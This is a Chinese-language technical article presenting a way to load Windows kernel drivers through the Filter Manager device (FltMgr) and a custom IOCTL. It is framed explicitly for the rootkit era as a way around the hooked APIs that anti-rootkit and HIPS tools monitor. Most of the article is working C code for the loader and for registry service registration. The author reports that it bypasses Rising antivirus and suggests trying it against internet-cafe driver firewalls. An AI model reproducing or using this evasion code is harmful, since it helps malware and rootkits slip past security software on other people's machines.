一種另類驅(qū)動加載辦法

華中科技大學(xué)

在這個病毒=Rootkit的時代，驅(qū)動的加載無疑是重中之重，自然的，各種ARK以及Hips對驅(qū)動也是嚴(yán)加防范，比如ZwLoadDriver，ZwSetsystemInformation等等，這些API大多都被SSDT HOOK了，使用這些API會被攔截掉，從而使得驅(qū)動無法加載，不過，也有一些繞過的辦法。

微軟為windows專門設(shè)計了一套微過濾驅(qū)動（mini filters），這套驅(qū)動是專用于管理文件過濾驅(qū)動的加載和運行，很多的虛擬磁盤驅(qū)動，還有還原軟件常用的磁盤過濾驅(qū)動，都是使用微過濾驅(qū)動進(jìn)行加載的，而且一般殺毒軟件對這塊管的并沒有那么嚴(yán)，所以可以從這里下手去加載。

不同于其他的驅(qū)動，Minifilter由一個獨立的manager管理而不僅僅是SCM（服務(wù)管理器），他的全稱叫Microsoft File System Filter Manager（想了解更多關(guān)于微處理管理器和微過濾驅(qū)動的內(nèi)容，可以到微軟官網(wǎng)查詢，http://www.microsoft.com/whdc/driver/filterdrv/default.mspx）。

加載驅(qū)動的主要代碼比較簡單

int main( int argc , char *argv[] )

{

HANDLE hDevice;

LOAD service_to_load;

BOOL err;

DWORD dwRet=0;

WCHAR drvPath[512];

memset( drvPath , 0 , 512 );

GetCurrentDirectoryW( MAX_PATH , drvPath );//將驅(qū)動放在當(dāng)前目錄下進(jìn)行加載

lstrcatW( drvPath , L"\\load.sys" );//驅(qū)動名稱必須為load.sys

make_reg( L"load" , drvPath );

hDevice = CreateFile ("\\\\.\\FltMgr" , GENERIC_READ | GENERIC_WRITE , FILE_SHARE_READ | FILE_SHARE_WRITE , NULL , OPEN_EXISTING , FILE_ATTRIBUTE_NORMAL , NULL );//啟用Fltmgr進(jìn)行驅(qū)動的加載

if( hDevice == INVALID_HANDLE_VALUE )

{

printf("CreateFile failed with status : %d\n" , GetLastError() );//這個是錯誤處理

goto __end;

}

wcscpy( service_to_load.ServiceName , L"load");

service_to_load.Len = wcslen( service_to_load.ServiceName )*sizeof(WCHAR);

err = DeviceIoControl( hDevice , MAGIC_IOCTL , &service_to_load , sizeof(service_to_load) , NULL , 0 , &dwRet , NULL );//傳送控制碼

if( !err )

{

printf("sorry\n");

goto __end;

}

printf(":)\n");

__end:

CloseHandle( hDevice );

return 0;

}

這段代碼和SCM加載驅(qū)動的代碼基本一致，只不過換成了Fltmgr進(jìn)行加載。

驅(qū)動還需要在注冊表中進(jìn)行服務(wù)的注冊，不過這個注冊和SCM加載的方式一摸一樣，也不必多說了。

VOID WINAPI make_reg( LPWSTR szDriverName, LPWSTR szDriverPath )

{

DWORD dwType = SERVICE_KERNEL_DRIVER; //定義注冊類型為內(nèi)核驅(qū)動

DWORD dwStart = SERVICE_DEMAND_START; //手動啟動服務(wù)

HKEY hKey;

WCHAR szMain[512] = {0};

WCHAR szImgPath[512] = {0};

wchar_t szRegPath[512]={0};

wsprintfW( szMain,

L"%s%s",

L"SYSTEM\\CurrentControlSet\\Services\\",

szDriverName );//在service鍵值下注冊

wsprintfW( szImgPath,

L"%s%s",

L"\\??\\",

szDriverPath);

if( RegCreateKeyW( HKEY_LOCAL_MACHINE, szMain, &hKey ) == ERROR_SUCCESS )

{

RegSetValueExW( hKey,

L"DisplayName",

0,

REG_SZ,

(LPBYTE)szDriverName,

(DWORD)lstrlenW(szDriverName)*2);

RegSetValueExW( hKey,

L"ImagePath",

0,

REG_EXPAND_SZ,

(LPBYTE)szImgPath,

(DWORD)lstrlenW(szImgPath)*2);

RegSetValueExW( hKey,

L"Type",

0,

REG_DWORD,

(LPBYTE)&dwType,

(DWORD)sizeof(dwType) );

RegSetValueExW( hKey,

L"Start",

0,

REG_DWORD,

(LPBYTE)&dwStart,

(DWORD)sizeof(dwStart) );

}

}

這種方法經(jīng)過測試，可以過瑞星2010最新版，360過不了，其他的待測，網(wǎng)吧的驅(qū)動防火墻不知能不能過，也許可以嘗試下……

如果對驅(qū)動的加載方式以及原理不是特別了解，可以去參考Programming The Windows Driver Model。